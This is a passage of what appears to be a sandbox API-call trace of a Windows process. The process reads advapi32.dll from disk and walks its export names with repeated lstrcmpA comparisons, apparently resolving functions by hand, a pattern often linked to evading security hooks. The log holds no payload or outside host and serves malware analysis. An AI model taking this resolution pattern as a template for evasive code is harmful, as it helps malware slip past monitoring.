lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.092] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0262.093] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0262.093] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0262.094] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0262.094] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0262.095] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0262.096] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0262.096] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0262.097] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0262.098] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0262.099] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0262.099] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0262.100] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0262.119] GetProcessHeap () returned 0x400000 [0262.274] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x3ff0040 | out: hHeap=0x400000) returned 1 [0262.288] GetProcessHeap () returned 0x400000 [0262.289] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x4190c0 [0262.294] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0262.296] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0262.296] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0262.296] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0262.297] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0262.297] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0262.297] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0262.297] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0262.297] GetProcessHeap () returned 0x400000 [0262.297] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0xa3ef0) returned 0x2c32010 [0262.300] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0262.300] ReadFile (in: hFile=0x140, lpBuffer=0x2c32010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c32010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0262.450] CloseHandle (hObject=0x140) returned 1 [0262.450] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0262.450] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0262.450] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0262.450] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0262.451] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0262.451] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0262.451] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0262.451] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0262.451] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0262.451] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0262.451] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0262.451] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0262.452] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0262.453] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0262.453] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0262.454] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0262.455] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0262.456] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0262.457] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 